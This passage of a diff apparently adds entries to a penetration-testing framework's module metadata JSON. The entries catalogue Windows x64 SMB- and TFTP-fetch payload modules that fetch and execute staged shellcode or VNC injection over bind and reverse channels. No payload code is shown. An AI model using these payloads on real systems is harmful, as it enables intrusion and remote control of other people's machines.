"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": { + "name": "SMB 
Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": 
"payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_http": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_https": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": 
"payload/cmd/windows/smb/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager 
(winhttp)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": { + "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 
15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": 
"payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/bind_named_pipe": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp_rc4": { + "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch 
and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + 
"stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_http": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_https": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_named_pipe": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 
Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp_rc4": { + "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/tftp/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_winhttp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_winhttps": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 